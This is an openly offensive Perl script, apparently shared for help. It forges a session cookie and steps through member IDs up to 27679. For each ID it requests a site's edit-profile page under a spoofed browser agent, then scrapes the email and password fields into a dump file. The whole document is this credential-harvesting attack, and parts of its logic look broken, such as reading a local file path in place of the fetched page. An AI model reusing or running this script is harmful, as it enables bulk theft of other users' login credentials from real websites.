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- #!/usr/bin/perl -w
- use Data::Dumper;
- use HTTP::Cookies;
- use LWP::UserAgent;
- use strict;
- $| =1;
- sub cookie{
- my $storedump = 'email-pass.txt';
- my $password = 'edit_profile.php';
- my ($member_id)=@_; # may error
- my $dir = 'C:\Users\Blue\Desktop\\edit_profile.php';
- my $file ='password.php';
- my $url ='';
- #=================================== Making cookie =========================================================
- my $cookie_jar = HTTP::Cookies->new('hide_cookie2'=>1);
- $cookie_jar->set_cookie(0,'member_id',$member_id,'/','',,,,,);
- $cookie_jar->set_cookie(0,'PHPSESSID','229ae718e80cf11840e997717a29b3c1','/','',,,,,);
- #================================== Cookie Yum Yump ====================================================
- #============================== Create own Fake browser ===========================================
- my $browser = LWP::UserAgent->new(
- agent=>'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20101026 Firefox/',
- cookie_jar => $cookie_jar,
- max_redirect => 0,
- timeout =>15,
- );
- #============================== Finished Madafaka ! ================================================
- my $resp = $browser->get($url);
- #my $resp = $browser->getstore("", 'password.php');
- my $content = $resp->content(); #make content store web scoure
- open (OUTPUT, '>'.$password);
- {
- print OUTPUT $content;
- print "[+]Done !! \n";
- print "Check out the file \n";
- }
- open (INPUT, $dir) or die ("[!]This file cannot be found \n");
- {
- while (my $line = <INPUT>){
- if($content=~ /password/){
- #============================================ Replace php code into humain code =========================================
- $line =~ s/email"\stype="text"\svalue="/Email:/ig;
- $line =~ s/password"\stype="password"\svalue="/Pass:/ig;
- #============================================ Finished replace Madafaka !! ==============================================
- open (DUMP,'>>'.$storedump) or die ("[!]The file for dump cannot be create \n");
- {
- #============================================================= Find Email / Password ===========================================
- if ($line =~ /(Email:.*?")/) {
- print "Member ID = $member_id:\n";
- print "$1 \n";
- print DUMP "Member ID = $member_id:\n";
- print DUMP "$1 \n";
- }
- if ($line =~ /(Pass:.*?")/){
- print "$1 \n";
- print DUMP "$1 \n";
- print DUMP "---------------------------------------------------------------------------------------------------\n";
- }
- #====================================================End find Email / Password ===========================================
- }#end if regular expression /password/
- }#end while
- }#End Open (INPUT)
- }
- close (DUMP);
- close(OUTPUT);
- close (INPUT);
- }
- #=============================================================================== start ========================================================
- print "Entre the start ID : ";
- chop (my $start_id = <stdin>);
- #print "Entre the end ID : ";
- #chop ($end_id = <stdin>);
- while($start_id<27679)
- {
- cookie($start_id); #How to inject the second passing value intro this subroutin
- $start_id =$start_id+1;
- }
- #============================================================================== END ============================================================
- sleep();
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